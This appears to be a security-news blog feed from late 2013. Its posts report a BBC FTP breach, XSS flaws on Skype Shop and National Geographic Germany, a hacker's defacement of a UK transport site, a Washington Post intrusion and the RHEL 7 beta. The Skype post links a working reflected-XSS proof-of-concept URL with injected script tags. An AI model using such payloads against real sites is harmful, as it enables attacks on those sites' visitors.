<b><u>Update:-</u></b> May be doing more that what we call late repent, but finally the above disclosed vulnerability has been patched by Facebook security team. </div>
<br />
<br />
<div class="sharedaddy sd-like-enabled sd-sharing-enabled" id="jp-post-flair">
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-74968137841056245312014-01-02T23:09:00.000+05:302014-01-02T23:09:49.999+05:30 BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>BBC</b> Server <b><span style="color: red;">Compromised!</span></b> <b>Russian Hackers</b> <i>Hacked</i> Into <b><span style="color: red;">FTP</span></b> & Tried to Sell <b>Unauthorized Access </b>on The<b> X-Mass Evening</b> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL28aQEEa_I83unjNK4R5HfgrriQdWbjpNcGiYrT9PZfTTiLGAUAERSPNuD6_9ukBoWTOMZBcI-KeiFZZXj1Gt0VtkjwZ8H_kBYK43mcoW-BL-SDkHRCf7iJ7z5Bf__4Yuikgpq6DxUR4/s1600/bbc-ftp-server-hacked-by-russian-hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL28aQEEa_I83unjNK4R5HfgrriQdWbjpNcGiYrT9PZfTTiLGAUAERSPNuD6_9ukBoWTOMZBcI-KeiFZZXj1Gt0VtkjwZ8H_kBYK43mcoW-BL-SDkHRCf7iJ7z5Bf__4Yuikgpq6DxUR4/s320/bbc-ftp-server-hacked-by-russian-hackers.jpg" width="400" /></a></div>
<div style="text-align: justify;">
Earlier we have seen world renowned media houses like <a href="http://www.voiceofgreyhat.com/search?q=CNN">CNN</a>, <a href="http://www.voiceofgreyhat.com/search?q=NBC">NBC</a>, <a href="http://www.voiceofgreyhat.com/search?q=Fox">Fox News</a>, <a href="http://www.voiceofgreyhat.com/search?q=Washington+Post">Washington Post</a>, <a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html">NY Times</a>, <a href="http://www.voiceofgreyhat.com/search?q=NDTV">NDTV</a> and so on have fallen victim to <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> and <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminals">cyber criminals</a>. Now it was the turn for world’s largest and oldest broadcaster -<b>British Broadcasting Corporation</b>, widely known to us as <b><a href="http://www.voiceofgreyhat.com/search?q=BBC">BBC</a></b>. Sources <a href="http://www.reuters.com/article/2013/12/29/us-bbc-cyberattack-idUSBRE9BS06K20131229">revealed</a> that cyber criminals have managed to <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a> the <a href="http://www.voiceofgreyhat.com/search?q=security+system">security system</a> of BBC and secretly took over a computer <a href="http://www.voiceofgreyhat.com/search?q=server">server</a> at the BBC and then launched a Christmas Day campaign to convince other cyber criminals to pay him for access to the system. The attack was first identified by a <a href="http://www.voiceofgreyhat.com/search?q=cyber+security">cyber security</a> firm named <a href="http://www.holdsecurity.com/">Hold Security LLC</a>, in Milwaukee that monitors <a href="http://www.voiceofgreyhat.com/search?q=cyber+crime">underground cyber crime</a> forums in search of stolen information. However, it is still not clear whether the hacker stole any information or data or caused any damage to the site. In conversation with press <b>Alex Holden</b>, founder and Chief Information Security Officer of Hold Security told -"So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC.” So far the identity of hacker has not been confirmed, but the firm researchers observed a notorious <a href="http://www.voiceofgreyhat.com/search?q=Russian+hacker">Russian hacker</a> known by the monikers <b>"HASH"</b> and <b>"Rev0lver," </b>attempting to sell access to the BBC server on December 25. However, BBC's security team managed to secure the site on Saturday, claims a person close to clean up efforts. One of the BBC spokesman refused to comment on the issue, he said, <i>“We do not comment on security issues.”</i> On the other hand, Justin Clarke, a principal consultant for the cyber security firm <a href="http://www.cylance.com/">Cylance</a>, said that while "accessing that server establishes a foothold within BBC's network which may allow an attacker to pivot and gain further access to internal BBC resources.” So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC. But we all know that <a href="http://www.voiceofgreyhat.com/search?q=FTP">ftp systems</a> are typically used to manage the transfer of large data files over the Internet. That's why the chances of <a href="http://www.voiceofgreyhat.com/search?q=data+breach">data breach</a> cant not be denied at this time. For updates on this piece of news and other hot information of the cyber & tech world stay tuned with <b><a href="http://www.voiceofgreyhat.com/">VOGH</a></b>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-7191343863096887272013-12-26T21:06:00.000+05:302013-12-26T21:06:53.678+05:30Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #3d85c6;">Skype Shop</span></b> & <b><span style="color: orange;">National Geographic Germany (Nat Geo) </span><span style="color: red;">Vulnerable</span></b> to <b><span style="color: red;">XSS </span></b>-Said <b><i>Dr41DeY</i></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKALpkZ1wIJCDCxQhXAxbIK2NXtyl2u4thKTFxayCXkplWNtPu9FQbcnEu7R1WxPJNN2uXh_A1Bl9sk_L5BIdA046gOL0jty5_2QTM3O_RWb2JdfilMdvwSptO8f3b87YDqgPtYBVUu_w/s1600/Skype-XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKALpkZ1wIJCDCxQhXAxbIK2NXtyl2u4thKTFxayCXkplWNtPu9FQbcnEu7R1WxPJNN2uXh_A1Bl9sk_L5BIdA046gOL0jty5_2QTM3O_RWb2JdfilMdvwSptO8f3b87YDqgPtYBVUu_w/s400/Skype-XSS.png" width="400" /></a></div>
<div style="text-align: justify;">
Couple of weeks ago, I have talked about the <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> of <a href="http://www.voiceofgreyhat.com/2013/12/cartoonnetworkvulnerable2-xss.html">Cartoon Network</a> official website, today I am going to speak about two more big fish who are posing serious <a href="http://www.voiceofgreyhat.com/search?q=security+holes">security holes</a> in their official websites. Lets not waste time while stretching the preface and come directly to the story -it's the <a href="http://www.voiceofgreyhat.com/search?q=hacker">hacker</a> who has recently made his name for some big hacks, has back again. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORGhAWJSBaevh8_VnZR1K7OQQ3t_vxi4jI7FyD2l1SusSxlopSj2EK7BNmSE3Dj1GHQLWzsJ35wS8PZPKjUf03ZoYeTZeFjEvDVGRF_C10Qezm4VlsnEpXq7Xelc-ZvLPS6sHgRAckYQ/s1600/Nat+Geo-XSS.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhORGhAWJSBaevh8_VnZR1K7OQQ3t_vxi4jI7FyD2l1SusSxlopSj2EK7BNmSE3Dj1GHQLWzsJ35wS8PZPKjUf03ZoYeTZeFjEvDVGRF_C10Qezm4VlsnEpXq7Xelc-ZvLPS6sHgRAckYQ/s320/Nat+Geo-XSS.png" width="320" /></a>Many of you are right, I am talking about <a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">'Dr41DeY'</a> because he is the guy who found <a href="http://www.voiceofgreyhat.com/search?q=vulnerability">vulnerability</a> in the official website of <b><a href="http://shop.skype.com/">Skype Shop</a></b> and <b><a href="http://www.nationalgeographic.de/">National Geographic Channel Germany (Nat Geo)</a></b>. Both Nat Geo and Skype have non persistent cross site scripting <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> also known as <b><a href="http://www.voiceofgreyhat.com/search?q=XSS">XSS vulnerability</a></b> in their website. We have already informed this issue to concerning authority and webmaster to avoid misfortune. As expected, while writing this <a href="http://www.voiceofgreyhat.com/search?q=skype">Skype</a> have taken this issue seriously and <a href="http://shop.skype.com/skype-cards/?cid=%22%3E%3Cscript%3Ealert%28%22Dr41DeY%20XSS'ed%20You%20@Nigerian%20Cyber%20Army%22%29%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E">fixed their loopholes</a> immediately. Still for proof- above I have shared the screenshots with our readers, <span style="font-family: inherit;">as evidence of the XSS hole. But unlike Skype Shop, Nat Geo yet not responded, so the vulnerability still exist on their portal. <span style="background-color: white; line-height: 24px;">Hopefully they will take appropriate steps with out doing more delay. For updates in this story and also other hot cyber issues, just stay tuned with </span><b style="background-color: white; line-height: 24px; margin: 0px; padding: 0px;"><a href="http://www.voiceofgreyhat.com/" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">VOGH</a></b><span style="background-color: white; line-height: 24px;">. Before concluding, I would like to remind you that- in 2012 an Indian hacker named</span></span><span style="line-height: 24px; text-align: left;"> Akshay has found <a href="http://www.voiceofgreyhat.com/2012/03/official-website-of-national-geographic.html">XSS holes in the official website of </a></span><span style="line-height: 24px; text-align: left;"><a href="http://www.voiceofgreyhat.com/2012/03/official-website-of-national-geographic.html">National Geographic</a>. Again after a year, </span><span style="text-align: left;"><span style="line-height: 24px;"><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a> found another <a href="http://www.voiceofgreyhat.com/search?q=National+Geographic">Nat GEO</a> site vulnerable to XSS, that definitely arises a doubt about the security concern of one of the world's leading </span></span><span style="line-height: 24px;">satellite television channel featuring documentaries with factual content involving nature, science, culture, and history, plus some reality and pseudo-scientific entertainment programming. </span></div>
<br />
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-3712196347744610472013-12-21T23:44:00.000+05:302013-12-21T23:44:55.520+05:30Taith North Wales Transport & Travel Planning of UK Govt Hacked By Pakistani Hacker<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="orphans: 2; text-align: center; widows: 2;">
<span style="font-size: large;"><b><span style="color: red;">Taith North Wales Transport & Travel Planning (Govt of UK)</span></b>, Few Other <b>High Profile Websites</b> <b><i><span style="color: red;">Hacked </span></i></b>By <b><span style="color: red;">'KHAN' </span>(Pakistani Hacker)</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHEvqElHvYHt-0wrvZAy5bimhQt4t1032Kic7zBfreG-ldzu-OAEwEmvo1oq0vseZlEJfpkbXrmjqTl-0a0lx5aTys-sAxQlpuwvkTjqeoIpJJN0MQ29NnsT8zvhKVFDEDMMFlwU5hiM/s1600/taith.gov.uk-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHEvqElHvYHt-0wrvZAy5bimhQt4t1032Kic7zBfreG-ldzu-OAEwEmvo1oq0vseZlEJfpkbXrmjqTl-0a0lx5aTys-sAxQlpuwvkTjqeoIpJJN0MQ29NnsT8zvhKVFDEDMMFlwU5hiM/s400/taith.gov.uk-hacked.png" width="450" /></a></div>
<div style="orphans: 2; text-align: justify; widows: 2;">
A hacker from <a href="http://www.voiceofgreyhat.com/search?q=Pakistan">Pakistan</a> going by the nick name of 'KHAN' has targeted a several high valued website of United Kingdom. The cyber attack happened few days ago where 'Khan' has hacked into the websites of Taith North Wales Transport and Travel Planning of UK Government. Taith is a joint committee of six county authorities from North Wales that handles transport and travel planning. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wfzwZi7kXieMsxwv2VR5SWANgEW1rfC5apnAXUNht1k2edEDWR1Ql5KzP15yWev_Z3PKXFLGWvZBZopL4kfK7KX5vBU00zUyPwahC6A_Rwcd5vaZoY6VhiKpPjw68L9zieYPKoqbm1Y/s1600/defaced-page-message-by-hacker.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7wfzwZi7kXieMsxwv2VR5SWANgEW1rfC5apnAXUNht1k2edEDWR1Ql5KzP15yWev_Z3PKXFLGWvZBZopL4kfK7KX5vBU00zUyPwahC6A_Rwcd5vaZoY6VhiKpPjw68L9zieYPKoqbm1Y/s320/defaced-page-message-by-hacker.png" width="320" /></a></div>
Sources revealed that the hacker belongs from Italy has managed to gain access into one the server of UK govt, and thus he successfully hack and change the index page with customized message saying- "today i am again with same message uk goverment deciding Ban Hijab for muslim womens what the hell is this! when your womens wear underware and come out of home beaches, road, you said this is freedom ? this is no problem ? but when our ladies , sisters , mothers wear hijab you said this is problem . so you call this justice ? i will fight for our right like a legend till i die .. We Want Freedom For Our Religion. You can kill us but cant kill our idea!" The hacker also claimed that not only defacement, but also he managed to breach the database of the website. As soon as the security breach get spotted the authorities of Taith North Wales Transport Dept, took immediate steps and restored the site. While the time of writing this news, Taith Transportation portal has come back to online to its normal format. Also in his deface page 'Khan' took the responsibility of intrusion against <a href="http://zone-hc.com/archive/mirror/8669152_eng.customs.ru_mirror_.html">Customs of Russia' official website</a>. This slew of hacking rampage also affected several other high profile website of UK such as <a href="http://www.zone-h.org/mirror/id/21369910">Hotel Black Boy Inn</a>, <a href="http://www.zone-h.org/mirror/id/21369598">Buckley Industry</a>, <a href="http://www.zone-h.org/mirror/id/21369570">Groes News</a>, <a href="http://www.zone-h.org/mirror/id/21369562">Spirit Models</a>, <a href="http://www.zone-h.org/mirror/id/21365219">Livetech</a>, <a href="http://www.zone-h.org/mirror/id/21370110">ByteBack Training</a> & few more.<br />
<br />
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-19051847596957765022013-12-20T00:55:00.002+05:302013-12-20T00:55:34.281+05:30The Washington Post Server Breached! Chinese Hackers Apprehend For This Cyber Attack <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>The Washington Post </b>Server <b><span style="color: red;">Hacked</span></b>! <i>Suspected</i> That <b><span style="color: red;">Chinese Hackers</span></b> Are Behind This <b>Cyber Attack </b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgDaQ-ACkxAxzNvUG38lJ96IejS7hyphenhyphenklJ2KDgDF3zJdRFoVz_RTmM4yjj6n9arx14InY9KF4TD7duicoTkengEHFsYeVEDrSVAF8RCBtZcQBaQ1cYRzLef2b3ZaSq4nKKn3-X9x9bgQfg/s1600/washington-post-hacked-by-chinese-hackers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgDaQ-ACkxAxzNvUG38lJ96IejS7hyphenhyphenklJ2KDgDF3zJdRFoVz_RTmM4yjj6n9arx14InY9KF4TD7duicoTkengEHFsYeVEDrSVAF8RCBtZcQBaQ1cYRzLef2b3ZaSq4nKKn3-X9x9bgQfg/s400/washington-post-hacked-by-chinese-hackers.jpg" width="500" /></a></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">Last week </span><a href="http://www.voiceofgreyhat.com/2013/12/china-eavesdropping-europeans-before-G20-summit.html" style="font-family: inherit;">the story</a><span style="font-family: inherit;"> of </span><a href="http://www.voiceofgreyhat.com/search?q=Chinese+eavesdropping" style="font-family: inherit;">Chinese eavesdropping</a><span style="font-family: inherit;"> on European ministries and diplomats at </span><a href="http://www.voiceofgreyhat.com/2013/12/china-eavesdropping-europeans-before-G20-summit.html" style="font-family: inherit;">G20 summit</a><span style="font-family: inherit;"> draws the attention of the entire </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+world" style="font-family: inherit;">cyber world</a><span style="font-family: inherit;"> and made headlines. Yet again another breathtaking issue came in-front where also </span><a href="http://www.voiceofgreyhat.com/search?q=China" style="font-family: inherit;">China</a><span style="font-family: inherit;"> found responsible for </span><a href="http://www.voiceofgreyhat.com/search?q=security+breach" style="font-family: inherit;">security breach</a><span style="font-family: inherit;"> that effected </span><b style="font-family: inherit;"><a href="http://www.washingtonpost.com/">The Washington Post</a></b><span style="font-family: inherit;"> - the most widely circulated newspaper published in Washington, D.C. </span><a href="http://www.washingtonpost.com/business/technology/hackers-break-into-washington-post-servers/2013/12/18/dff8c362-682c-11e3-8b5b-a77187b716a3_story.html" style="font-family: inherit;">Sources reveled</a><span style="font-family: inherit;"> that </span><a href="http://www.voiceofgreyhat.com/search?q=hackers" style="font-family: inherit;">hackers</a><span style="font-family: inherit;"> broke into The Washington Post’s servers and gained access to </span><b style="font-family: inherit;"><span style="color: red;">employee user names and passwords</span></b><span style="font-family: inherit;">. </span><a href="https://www.mandiant.com/%E2%80%8E" style="font-family: inherit;">Mandiant</a><span style="font-family: inherit;">, a </span><a href="http://www.voiceofgreyhat.com/search?q=cyber+security" style="font-family: inherit;">cyber security</a><span style="font-family: inherit;"> contractor that monitors The Washington Post’s networks, said the </span><a href="http://www.voiceofgreyhat.com/search?q=intrusion" style="font-family: inherit;">intrusion</a><span style="font-family: inherit;"> was of relatively short duration. The extent of the loss of company data was not immediately clear, still the matter of relief is that the company </span><a href="http://www.voiceofgreyhat.com/search?q=password" style="font-family: inherit;">passwords</a><span style="font-family: inherit;"> are stored in </span><a href="http://www.voiceofgreyhat.com/search?q=encrypted" style="font-family: inherit;">encrypted form</a><span style="font-family: inherit;">, hackers in some cases have shown the ability to decode such information. although to avoid any further mishap Washington Post have planned to ask all employees to </span><b style="font-family: inherit;">change their user names and passwords</b><span style="font-family: inherit;"> on the assumption that many or all of them may have been </span><a href="http://www.voiceofgreyhat.com/search?q=compromised" style="font-family: inherit;">compromised</a><span style="font-family: inherit;">. Officials at Washington Post said that they saw no evidence that subscriber information, such as credit cards or home addresses, was accessed by the hackers. Nor was there any sign that the hackers had gained access to The Post’s publishing system, e-mails or sensitive personal information of employees, such as their Social Security numbers. Post officials found that this hack is more-recent than the </span><a href="http://www.washingtonpost.com/business/technology/chinese-hackers-suspected-in-attack-on-the-posts-computers/2013/02/01/d5a44fde-6cb1-11e2-bd36-c0fe61a205f6_story.html" style="font-family: inherit;">2011 one</a><span style="font-family: inherit;">. They also said, began with an intrusion into a server used by The Post’s foreign staff but eventually spread to other company servers before being discovered. </span><i style="font-family: inherit;">“This is an ongoing investigation, but we believe it was a few days at most,”</i><span style="font-family: inherit;"> said Post spokeswoman Kris Coratti. </span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">China not only targeted Washington Post, <span style="background-color: white; line-height: 24px; margin: 0px; padding: 0px;">If you look at the story of major <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">cyber attacks</a> of <a href="http://www.voiceofgreyhat.com/2013/" style="margin: 0px; outline: none; padding: 0px; text-decoration: none;">this year</a> we will find that the name of China has been involved</span><span style="background-color: white;"><span style="line-height: 24px;"> several times for engaging <a href="http://www.voiceofgreyhat.com/search?q=cyber+attacks">cyber attacks</a> against several high profile news organization of U.S. including </span></span><a href="http://www.voiceofgreyhat.com/2013/02/chinese-hackers-breached-new-york-times.html" style="background-color: white; line-height: 24px; margin: 0px; outline: none; padding: 0px; text-decoration: none;"><span style="margin: 0px; padding: 0px;">New York Times</span></a><span style="background-color: white; line-height: 24px;">, </span><a href="http://www.voiceofgreyhat.com/2013/02/NBC.com-Compromised.html" style="background-color: white; line-height: 24px; margin: 0px; outline: none; padding: 0px; text-decoration: none;"><span style="margin: 0px; padding: 0px;">NBC</span></a><span style="background-color: white; line-height: 24px;"> and so on. So far <a href="http://www.voiceofgreyhat.com/search?q=Chinese+Government">Chinese Government </a>have not responded to this issue, also none of Chinese hacker community take the responsibility of this <a href="http://www.voiceofgreyhat.com/search?q=breach">breach</a>. For upcoming updates on this story stay tuned with <a href="http://www.voiceofgreyhat.com/">VOGH</a>. </span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="background-color: white; line-height: 24px;"><br /></span></span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-2746002507731690882013-12-20T00:55:00.000+05:302013-12-20T00:55:22.039+05:30Red Hat Enterprise Linux 7 Beta Arrives! Download Now And You Can Win $500<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">Red Hat Enterprise Linux (RHEL) 7</span></b> Arrived With Expanded <b>Container Support</b>, <b>Performance Profiles</b>, <b>XFS</b> As the Default Filesystem & Many More. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqZ1WPgSCWcIasn-yOLTixJpIMK7YNGeR20Pr4q_zMuklQ7ziSGcOFEvGd7eU1Xk6jaUgX1Lh215kpKlrmeIatlr_MDzbzazk6rSr2bXnkCfcBn4SXGcRngPc2HfY0teA0gPt9uUu4dZs/s1600/Red+Hat+Enterprise+Linux+7+Beta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqZ1WPgSCWcIasn-yOLTixJpIMK7YNGeR20Pr4q_zMuklQ7ziSGcOFEvGd7eU1Xk6jaUgX1Lh215kpKlrmeIatlr_MDzbzazk6rSr2bXnkCfcBn4SXGcRngPc2HfY0teA0gPt9uUu4dZs/s400/Red+Hat+Enterprise+Linux+7+Beta.png" width="500" /></a></div>
<span style="font-family: inherit;">We have just spent a less than a month time after the release of <a href="http://www.voiceofgreyhat.com/2013/11/redhat-enterprise-linux-rhel-6.5-released.html">Red Hat Enterprise Linux 6.5</a> made available globally, yet again the <a href="http://www.voiceofgreyhat.com/search?q=America">American</a> multinational software company, leading the world for <a href="http://www.voiceofgreyhat.com/search?q=open-source">open-source</a> software has <a href="http://www.redhat.com/about/news/archive/2013/12/red-hat-announces-availability-of-red-hat-enterprise-linux-7-beta">announced</a> the availability of a first public beta release of <b><a href="http://www.voiceofgreyhat.com/search?q=RHEL">Red Hat Enterprise Linux (RHEL) </a>version 7</b>. Based on <b><a href="http://www.voiceofgreyhat.com/search?q=Fedora">Fedora 19</a> </b>and the upstream <b><a href="http://www.voiceofgreyhat.com/search?q=kernel">Linux 3.10 kernel</a></b>, Red Hat Enterprise Linux 7 will provide users with powerful new capabilities that streamline and automate installation and deployment, simplify management, and enhance ease-of-use, all while delivering the stability that enterprises have come to expect from <a href="http://www.voiceofgreyhat.com/search?q=Red+Hat">Red Hat</a>. This further solidifies Red Hat Enterprise Linux's place as the world's leading Linux platform and a standard for the enterprise of the future. Whether rolling out new applications, virtualizing environments or scaling the business with cloud, Red Hat Enterprise Linux 7 delivers the keystone to IT success. The beta release of Red Hat Enterprise Linux 7 adds value to new and existing IT projects across industries by adding key capabilities to improve critical but often cumbersome IT tasks like <a href="http://www.voiceofgreyhat.com/search?q=virtualization">virtualization</a> and storage while offering a clear pathway to the <a href="http://www.voiceofgreyhat.com/search?q=hybrid+cloud">open hybrid cloud</a>. </span>In their official Red Hat Enterprise Linux YouTube channel, Red Hat posted a short video where you can hear what the team at Red Hat has to say about the next-generation of the world’s leading Linux platform.</div>
<div style="text-align: justify;">
<span class="embed-youtube" style="display: block; text-align: center;"><iframe class="youtube-player" frameborder="0" height="359" src="http://www.youtube.com/embed/3dUO_JVxvi0?version=3&rel=1&fs=1&showsearch=0&showinfo=1&iv_load_policy=1&wmode=transparent" type="text/html" width="584"></iframe></span><br />
<div class="sharedaddy sd-like-enabled sd-sharing-enabled" id="jp-post-flair">
</div>
<span style="font-family: inherit;">Red Hat Enterprise Linux 7 Beta showcases hundreds of new features and enhancements, including: </span></div>
<div style="text-align: justify;">
<ul style="background-color: white; border: 0px; line-height: 24px; list-style: square; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Linux Containers</strong><b> </b>- Enabling applications to be created and deployed in isolated environments with allocated resources and permissions.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Performance Management</strong> – Using built in tools, you can optimize performance out-of-the-box.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Physical and Hosted In-place Upgrades </strong>- In-place upgrades for common server deployment types are now supported. Additionally, virtual machine migration from a Red Hat Enterprise Linux 6 host to a Red Hat Enterprise Linux 7 host is possible, without virtual machine modification or downtime.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><div style="text-align: justify;">
<strong style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">File Systems</strong><span style="font-family: inherit; font-style: inherit; font-weight: inherit;"> </span><span style="font-family: inherit; font-style: inherit; font-weight: inherit;">– File systems continue to be a major focus of development and innovation.</span></div>
<ul style="border: 0px; font-style: inherit; font-weight: inherit; list-style: square; margin: 0px 0px 0px 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">XFS is now the default file system, supporting file systems up to 500TB</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">ext4 file systems are now supported to 50TB and include block sizes up to 1MB</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">btrfs file systems are now available to test</span></li>
</ul>
</li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><div style="text-align: justify;">
<strong style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Networking</strong><span style="font-family: inherit; font-style: inherit; font-weight: inherit;"> </span><span style="font-family: inherit; font-style: inherit; font-weight: inherit;">– Enhanced networking configuration and operation. Added support for some of the latest networking standards, including:</span></div>
<ul style="border: 0px; font-style: inherit; font-weight: inherit; list-style: square; margin: 0px 0px 0px 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">40Gb Ethernet support</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">Improved channel bonding</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">TCP performance improvements</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;">Low latency socket poll support</span></li>
</ul>
</li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Storage</strong> – Expanded support for enterprise level storage arrays. Improved scalable storage stack for deployments that are less disk intensive. Improved storage management for heterogeneous storage environments.</span></li>
<li style="border: 0px; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="font-family: inherit;"><strong style="border: 0px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Windows Interoperability</strong> – Bridge Windows™ and Linux infrastructure by integrating SAMBA 4.1 with existing Microsoft Active Directory domains. Or, deploy Red Hat Enterprise Linux Identity Management in a parallel trust zone with Active Directory.</span></li>
